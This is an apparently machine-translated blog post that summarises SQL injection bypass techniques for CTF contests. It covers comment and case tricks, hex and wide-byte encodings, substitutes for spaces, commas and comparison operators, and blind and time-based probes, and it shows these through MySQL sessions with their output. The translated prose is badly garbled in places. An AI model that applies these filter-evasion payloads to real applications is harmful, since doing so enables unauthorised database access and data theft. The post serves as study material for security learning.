Summary of SQL injection bypass methods

Transferred to ：sql Summary of injection bypass methods _huanghelouzi The blog of -CSDN Blog _sql Bypass

Preface

SQL stay CTF In every competition, there will be , So here is a summary , Anti forgetting , Last updated on 2018/10/11.

In short ：SQL Inject The data entered by the user becomes the code to be executed

    string sql = "select id,no from user where id=" + id;

  We want the user to enter id Value , Just one character string , Incoming database execution , But when you enter ： 2 or 1=1 when , Among them or 1=1 It was done sql sentence To perform the .

sql Injection bypass

Annotation symbols bypass

Common annotations are

--  The comment 
#  The comment 
/* The comment */
;

  example

mysql> select * from users -- where id = 1;
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |

mysql> select * from users # where id = 2;
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |

mysql> select * from users where id = 3 /*+1*/
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test3    | pass1    |
+----+----------+----------+
1 row in set (0.00 sec)

Case around

Commonly used in waf Case insensitive case insensitive case insensitive case , It's usually the topic that I deliberately designed .
for example ：waf Filtered keywords select, You can try to use Select And so on .

mysql> select * from users where id = -1 union select 1,2,3
    -> ;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+
1 row in set (0.00 sec)

# Case around 
mysql> select * from users where id = -1 union Select 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+

Inline comments bypass

Inline annotation is to put some unique only in MYSQL Put the statement on /*!...*/ in , In this way, these statements will not be executed in other databases , But in MYSQL Will perform .

mysql> select * from users where id = -1 union /*!select*/ 1,2,3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | 2        | 3        |
+----+----------+----------+

Double write keyword bypass

In some simple waf in , Put keywords select Use only replace() Function replacement is empty , At this time, you can use double write keywords to bypass . for example select become seleselectct, after waf After processing, it becomes select, Meet the requirements of bypass .

Special encoding bypasses

• Hexadecimal bypass

mysql> select * from users where username = 0x7465737431;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

• ascii Code bypass
  Test Equivalent to
  CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
  tip: It seems that the new version mysql It's not working

Space filtering bypasses

Generally, there are several ways to bypass space filtering to replace space

/**/
()
 enter (url In coding %0a)
`(tap The button above the key )
tap
 Two spaces 

mysql> select/**/*/**/from/**/users;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |
|  3 | test3    | pass1    |
+----+----------+----------+

# Note that brackets must not contain *
mysql> select(id)from(users);
+----+
| id |
+----+
|  1 |
|  3 |

mysql> select
    -> *
    -> from 
    -> users
    -> where 
    -> id = 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

mysql> select`id`from`users`where`id`=1;
+----+
| id |
+----+
|  1 |
+----+

Filter or and xor not Bypass

and = &&
or = ||
xor = | #  Exclusive or 
not = !

Filter the equal sign = Bypass

No addition wildcard Of like The effect of execution and = Agreement , So it can be used to bypass .

Normal plus wildcard like：

mysql> select * from users where username like "test%";
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  3 | test3    | pass1    |
+----+----------+----------+

Without wildcards like Can be used instead of =：

mysql> select * from users where id like 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

rlike: Fuzzy matching , As long as the value of the field contains part Will be selected
To replace = when ,rlike And the above like equally , No wildcard effect and = equally

mysql> select * from users where id rlike 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

regexp:MySQL Use in REGEXP Operator for regular expression matching

mysql> select * from users where id regexp 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

Use the size sign to bypass

mysql> select * from users where id > 1 and id < 3;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  2 | user2    | pass1    |
+----+----------+----------+

<> Equivalent to !=
So add another one in front ! The result is an equal sign

mysql> select * from users where !(id <> 1);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id = 1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.00 sec)

The equal sign bypass can also be used strcmp(str1,str2) function 、between Keywords, etc , For details, please refer to the following filter size in order to bypass
The filter size bypasses the

stay sql Blind note , Generally, the size and sign are used to judge ascii The size of the code value to achieve the blasting effect . But if you filter the size and sign , Then cool . How come? , You can use the following keywords to bypass

    greatest(n1, n2, n3…): return n Maximum of

mysql> select * from users where id = 1 and greatest(ascii(substr(username,1,1)),1)=116;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

• least(n1,n2,n3…): return n Minimum of

• strcmp(str1,str2): If all strings are the same , Then return to STRCMP(), According to the current classification order , The first parameter is less than the second , Then return to -1, Other cases return to 1

mysql> select * from users where id = 1 and strcmp(ascii(substr(username,1,1)),117);
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.00 sec)

mysql> select * from users where id = 1 and strcmp(ascii(substr(username,1,1)),116);
Empty set (0.00 sec)

• in keyword

mysql> select * from users where id = 1 and substr(username,1,1) in ('t');
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.01 sec)

mysql> select * from users where id = 1 and substr(username,1,1) in ('y');
Empty set (0.00 sec)

• between a and b: The scope is a-b Between

mysql> select * from users where id between 1 and 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |
+----+----------+----------+
2 rows in set (0.00 sec)

mysql> select * from users where id = 1 and substr(username,1,1) between 'a' and 'b';
Empty set (0.00 sec)

mysql> select * from users where id = 1 and substr(username,1,1) between 'a' and 't';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+
1 row in set (0.00 sec)

Use between a and b Sentence etc.

mysql> select * from users where id = 1 and substr(username,1,1) between 't' and 't';
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
+----+----------+----------+

Filter quotes around

• Use hexadecimal

select column_name  from information_schema.tables where table_name=0x7573657273;

• Wide bytes

Commonly used in web The character set used by the application is GBK when , And filtered the quotation marks , You can try wide bytes .

#  When filtering single quotation marks 
%bf%27 %df%27 %aa%27

%df\’ = %df%5c%27= A kind of ’

Filter commas around

sql The following functions are commonly used in blind injection ：

substr()
        substr(string, pos, len): from pos Start , Take the length as len The string of
        substr(string, pos): from pos Start , Fetch string Last
substring()
        Usage and substr() equally
mid()
        Usage and substr() equally , however mid() It's for downward compatibility VB6.0, Outdated , Of the above functions pos from 1 At the beginning
left() and right()
        left(string, len) and right(string, len): Take it from left or right string The middle length is len The string of
limit
        limit pos len: From... In the return item pos Began to len Return values ,pos From the 0 Start
ascii() and char()
        ascii(char): hold char This character is changed to ascii code
        char(ascii_int): and ascii() The opposite is true , take ascii Code to character

Back to the point , If waf Filtered commas , And only blind injection （ Blind injection is basically inseparable from commas ）, In several functions that take substrings , One alternative to commas is to use from pos for len, among pos For from pos Start reading len Substring of length
For example, in substr() In equal function , The conventional way of writing is

mysql> select substr("string",1,3);
+----------------------+
| substr("string",1,3) |
+----------------------+
| str                  |
+----------------------+

If you filter commas , It can be used in this way from pos for len To replace

mysql> select substr("string" from 1 for 3);
+-------------------------------+
| substr("string" from 1 for 3) |
+-------------------------------+
| str                           |
+-------------------------------+
1 row in set (0.00 sec)

stay sql Blind note , If you filter commas , The following refers to the following writing to bypass

mysql> select ascii(substr(database() from 1 for 1)) > 120;
+----------------------------------------------+
| ascii(substr(database() from 1 for 1)) > 120 |
+----------------------------------------------+
|                                            0 |
+----------------------------------------------+
1 row in set (0.00 sec)

mysql> select ascii(substr(database() from 1 for 1)) > 110;
+----------------------------------------------+
| ascii(substr(database() from 1 for 1)) > 110 |
+----------------------------------------------+
|                                            1 |
+----------------------------------------------+

You can also use join Keyword to bypass

mysql> select * from users  union select * from (select 1)a join (select 2)b join(select 3)c;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | test1    | pass     |
|  2 | user2    | pass1    |
|  3 | test3    | pass1    |
|  1 | 2        | 3        |
+----+----------+----------+

Among them

union select * from (select 1)a join (select 2)b join(select 3)c

Equivalent to

union select 1,2,3

Use like keyword
Apply to substr() The comma in the function that extracts the substring

mysql> select ascii(substr(user(),1,1))=114;
+-------------------------------+
| ascii(substr(user(),1,1))=114 |
+-------------------------------+
|                             1 |
+-------------------------------+

mysql> select user() like "r%";
+------------------+
| user() like "r%" |
+------------------+
|                1 |
+------------------+

mysql> select user() like "t%";
+------------------+
| user() like "t%" |
+------------------+
|                0 |
+------------------+

Use offset keyword
Apply to limit The comma in is filtered
limit 2,1 Equivalent to limit 1 offset 2

mysql> select * from users limit 2,1;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test3    | pass1    |
+----+----------+----------+

mysql> select * from users limit 1 offset 2;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  3 | test3    | pass1    |
+----+----------+----------+

The filter function bypasses

• sleep() -->benchmark()

mysql> select 12,23 and sleep(1);
+----+-----------------+
| 12 | 23 and sleep(1) |
+----+-----------------+
| 12 |               0 |
+----+-----------------+
1 row in set (1.00 sec)

# MySQL There is a built-in BENCHMARK() function , You can test the execution speed of certain operations . 
 Parameters can be the number of times to execute and the expression . The first parameter is the number of execution , The second executed expression 
mysql> select 12,23 and benchmark(1000000000,1);
+----+--------------------------------+
| 12 | 23 and benchmark(1000000000,1) |
+----+--------------------------------+
| 12 |                              0 |
+----+--------------------------------+
1 row in set (4.61 sec)

• ascii()–>hex()、bin()
  After substitution, use the corresponding base conversion string that will do
• group_concat()–>concat_ws()

mysql> select group_concat("str1","str2");
+-----------------------------+
| group_concat("str1","str2") |
+-----------------------------+
| str1str2                    |
+-----------------------------+
1 row in set (0.00 sec)

# The first parameter is the separator 
mysql> select concat_ws(",","str1","str2");
+------------------------------+
| concat_ws(",","str1","str2") |
+------------------------------+
| str1,str2                    |
+------------------------------+

• substr(),substring(),mid() They can replace each other , Functions that take substrings and left(),right()
• user() --> @@user、datadir–>@@datadir
• ord()–>ascii(): These two functions have the same effect when dealing with English , But the processing time of Chinese is inconsistent .